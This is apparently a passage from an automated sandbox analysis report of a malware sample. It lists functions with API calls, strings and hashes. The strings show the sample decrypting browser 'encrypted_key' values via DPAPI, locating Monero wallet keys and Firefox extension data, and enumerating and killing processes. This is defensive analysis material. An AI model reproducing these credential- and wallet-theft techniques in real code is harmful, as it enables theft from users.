                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: 7451EE72A00226EFEB298F14E965BBA73B4FF01310F24413DE90586692E739ED40DB91
                                  Function 006BA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 006BA664
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: 510394d4f598d35c387da00fd4f031a6482582339072d219ef302da27bae0655
                                  • Instruction ID: 6763e3303b1acdcec00f5fcfc2789eaef36283118be46a4e169601e0cc09c0a9
                                  • Opcode Fuzzy Hash: 510394d4f598d35c387da00fd4f031a6482582339072d219ef302da27bae0655
                                  • Instruction Fuzzy Hash: DB5138B4A1420CABDB24EFE4CDA6FED7776AF44304F40811CE90A5B291DB70AA45CB56
                                  Function 006BF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006D1678,006D0D93), ref: 006BF64C
                                  • lstrlen.KERNEL32(00000000), ref: 006BF66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 9c47fdaec699d0a0aa3202e2fdf889884e4a92b963bd5ce7e941671b991a018f
                                  • Instruction ID: bf4a527c615298d8c05b619253cb97d080e9f8f5a77bf4393313270ca08ca25d
                                  • Opcode Fuzzy Hash: 9c47fdaec699d0a0aa3202e2fdf889884e4a92b963bd5ce7e941671b991a018f
                                  • Instruction Fuzzy Hash: 5D51FD7191010CAACB44FBE4EDA2EFD733AEF54304F40856DE51666191EE34AA08CB6A
                                  Function 006C37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 12a1f6cad5a9df957e3f35a197b0f74464b795f030ec32c9cd10ca128cfa8262
                                  • Instruction ID: 3e2f1ff7a15ec9a693e203c99a461f48e517c1c736a1a38a8e57b94bfd450aa5
                                  • Opcode Fuzzy Hash: 12a1f6cad5a9df957e3f35a197b0f74464b795f030ec32c9cd10ca128cfa8262
                                  • Instruction Fuzzy Hash: A8411971E102099BDB04EFE4D955FFEB77AEF48308F10801DE51676290EB70AA05CBA6
                                  Function 006BA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006BA13C
                                    • Part of subcall function 006BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006BA161
                                    • Part of subcall function 006BA110: LocalAlloc.KERNEL32(00000040,?), ref: 006BA181
                                    • Part of subcall function 006BA110: ReadFile.KERNEL32(000000FF,?,00000000,006B148F,00000000), ref: 006BA1AA
                                    • Part of subcall function 006BA110: LocalFree.KERNEL32(006B148F), ref: 006BA1E0
                                    • Part of subcall function 006BA110: CloseHandle.KERNEL32(000000FF), ref: 006BA1EA
                                    • Part of subcall function 006C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006C8FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006BA489
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA23F
                                    • Part of subcall function 006BA210: LocalAlloc.KERNEL32(00000040,?,?,?,006B4F3E,00000000,?), ref: 006BA251
                                    • Part of subcall function 006BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Ok,00000000,00000000), ref: 006BA27A
                                    • Part of subcall function 006BA210: LocalFree.KERNEL32(?,?,?,?,006B4F3E,00000000,?), ref: 006BA28F
                                    • Part of subcall function 006BA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006BA2D4
                                    • Part of subcall function 006BA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 006BA2F3
                                    • Part of subcall function 006BA2B0: LocalFree.KERNEL32(?), ref: 006BA323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: bd127ca82e74ea01035bea4ad3b33dca0ae1463b860059df6393760c1405afbc
                                  • Instruction ID: 139926836e43a634c982d13a79e1e337a2a7dfd48ae7dae7c1b7f6dcbf553343
                                  • Opcode Fuzzy Hash: bd127ca82e74ea01035bea4ad3b33dca0ae1463b860059df6393760c1405afbc
                                  • Instruction Fuzzy Hash: 5D3130B6D1010DABCF24DBD4DC45EEEB7BAAF58304F44451DE902A7241E7319A44CBA6
                                  Function 006C9660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 006C967B
                                    • Part of subcall function 006C8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006C96AE,00000000), ref: 006C8EEB
                                    • Part of subcall function 006C8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 006C8EF2
                                    • Part of subcall function 006C8EE0: wsprintfW.USER32 ref: 006C8F08
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006C973B
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C9759
                                  • CloseHandle.KERNEL32(00000000), ref: 006C9766
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 964ee37486ab13681d7f947449f8b86478d658ba4bd93cda0e58999acbefb7ee
                                  • Instruction ID: 8586ef0654e56f8ca0eb9aeb9b1640de302d14e91ab301c2dc38834eaadfb51d
                                  • Opcode Fuzzy Hash: 964ee37486ab13681d7f947449f8b86478d658ba4bd93cda0e58999acbefb7ee
                                  • Instruction Fuzzy Hash: FB3159B1A15208ABDB14DFE0CD89FEDB379FB44700F20445CF606AB284DB74AA48DB61
                                  Function 006C8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006D05BF), ref: 006C885A
                                  • Process32First.KERNEL32(?,00000128), ref: 006C886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 006C8883
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • CloseHandle.KERNEL32(?), ref: 006C88F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 52585f1ff4ba0f624f74f4da9c886a01f430d5f3ebc67bdddc2b33600267b5fe
                                  • Instruction ID: 7f8364f8f9b9f4cbcbd804b87279e9be28534f508745462cafe8501069742edb
                                  • Opcode Fuzzy Hash: 52585f1ff4ba0f624f74f4da9c886a01f430d5f3ebc67bdddc2b33600267b5fe
                                  • Instruction Fuzzy Hash: 21315971905218ABCB64EB95DC55FFEB37AEB04704F10419DF10AA32A0DB30AE44CFA5
                                  Function 0072FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0072FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0072FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: b8a0f7af0551925c54d6b9660a1ca0c4568f3755ed6db12bef9164ff8bfe73fb
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: E401843250D735EEF63A26746CC9A6B37A4EB017B5B354339F116851F3EF694C419240
                                  Function 006CCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 006CCA7E
                                    • Part of subcall function 006CC2A0: __amsg_exit.LIBCMT ref: 006CC2B0
                                  • __getptd.LIBCMT ref: 006CCA95
                                  • __amsg_exit.LIBCMT ref: 006CCAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 006CCAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 96c6376f016876d78b941607826060b4a9a774ab165e4bcb55ea45fbc112bf51
                                  • Instruction ID: 177372d8585ef9d12f03ba57c09b248d2b54d05692f63107ea5733e200df9ad9
                                  • Opcode Fuzzy Hash: 96c6376f016876d78b941607826060b4a9a774ab165e4bcb55ea45fbc112bf51
                                  • Instruction Fuzzy Hash: BAF096319442199BD7A0FBE8580BF7E73A3EF40730F11114EF40D962D2CB2459418B9D
                                  Function 007304D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: 9fa63f8cd776fd04144f791d26d7f99e27613b2d2a4a9d69ddce38f86eb09871
